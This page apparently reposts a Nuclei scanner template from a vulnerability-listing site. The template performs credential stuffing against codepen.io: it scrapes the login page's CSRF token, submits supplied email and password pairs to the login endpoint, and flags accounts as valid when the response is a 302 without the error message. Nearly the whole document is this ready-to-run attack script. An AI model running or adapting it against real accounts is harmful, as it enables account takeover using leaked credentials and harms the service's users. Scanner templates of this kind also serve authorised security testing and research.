漏洞描述
Checks for a valid codepen account.
codepen-login-check: codepen.io Login Check
PoC代码[已公开]
id: codepen-login-check
info:
name: codepen.io Login Check
author: parthmalhotra,pdresearch
severity: critical
description: Checks for a valid codepen account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 2
tags: creds-stuffing,login-check,cloud,codepen,vuln
self-contained: true
http:
- raw:
- |
GET https://codepen.io/login HTTP/1.1
Host: codepen.io
- |
POST https://codepen.io/login/login HTTP/1.1
Host: codepen.io
Content-Type: application/x-www-form-urlencoded
X-CSRF-Token: {{token}}
authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage
extractors:
- type: dsl
dsl:
- username
- password
- type: xpath
part: body
xpath:
- '//input[@name="authenticity_token"]/@value'
name: token
internal: true
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'The username or password you entered is incorrect, please try again.'
- type: status
status:
- 302
# digest: 4a0a00473045022016f5fd8f18542d0ddd93684d7cd69901f089c2e2950a384f04c1bf6287f57ad50221008253ef5d9e0e2ed653fd7d78e7ab566ee30f6a4a7b5b13eef9533d4fade2da87:922c64590222798bb761d5b6d8e72950